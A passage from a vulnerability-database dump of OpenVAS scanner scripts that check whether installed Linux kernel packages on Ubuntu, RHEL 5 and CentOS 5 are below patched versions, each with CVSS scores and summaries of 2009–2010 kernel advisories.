rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.27\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-virtual\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:01", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-01-18T00:00:00", "published": "2010-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870210", "id": "OPENVAS:1361412562310870210", "type": "openvas", "title": "RedHat Update for kernel RHSA-2010:0046-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0046-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, possibly, privilege escalation. (CVE-2009-3080, Important)\n \n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n \n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n \n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n \n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have "/proc/sys/fs/suid_dumpable" set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n \n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n \n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n \n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n "/sys/class/scsi_host/[a qla2xxx host]/vport_create" and "vport_delete".\n These two files were world-writable by default, allowing a local ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00013.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870210\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-20 09:25:19 +0100 (Wed, 20 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0046-01\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"RedHat Update for kernel RHSA-2010:0046-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:33", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880643", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880643", "title": "CentOS Update for kernel CESA-2010:0046 centos5 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0046 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880643\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2010:0046\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"CentOS Update for kernel CESA-2010:0046 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n\n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n\n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n\n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n\n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have '/proc/sys/fs/suid_dumpable' set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n\n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n\n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and 'vport_delete'.\n These two files were world-writable by default, allowing a local user to\n change SCSI host at ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-12-21T11:33:00", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-12-21T00:00:00", "published": "2010-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870210", "id": "OPENVAS:870210", "title": "RedHat Update for kernel RHSA-2010:0046-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0046-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, possibly, privilege escalation. (CVE-2009-3080, Important)\n \n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n \n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n \n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n \n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have "/proc/sys/fs/suid_dumpable" set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n \n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n \n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n \n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n "/sys/class/scsi_host/[a qla2xxx host]/vport_create" and "vport_delete".\n These two files were world-writable by default, allowing a local ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00013.html\");\n script_id(870210);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-20 09:25:19 +0100 (Wed, 20 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0046-01\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"RedHat Update for kernel RHSA-2010:0046-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres 